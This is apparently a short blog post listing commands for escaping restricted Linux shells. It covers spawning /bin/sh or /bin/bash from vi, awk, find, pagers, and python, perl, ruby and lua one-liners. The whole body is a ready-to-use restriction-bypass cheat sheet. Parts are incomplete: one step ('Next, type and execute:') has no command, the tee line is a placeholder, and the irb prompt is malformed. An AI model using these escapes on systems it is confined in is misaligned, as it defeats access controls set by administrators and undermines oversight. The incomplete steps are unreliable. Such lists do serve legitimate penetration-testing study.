Escaping Restricted Linux Shells

From vi or vim

:set shell=/bin/bash

Next, type and execute:


Another method is to type:

:! /bin/bash

From awk

awk 'BEGIN {system("/bin/sh")}'

From find

find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

From more, less and man

'! /bin/sh'

From tee

echo "evil script code" | tee

From your fav language try following

python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
irb(main:001:0> exec "/bin/sh"


Leave a Reply

Your email address will not be published. Required fields are marked *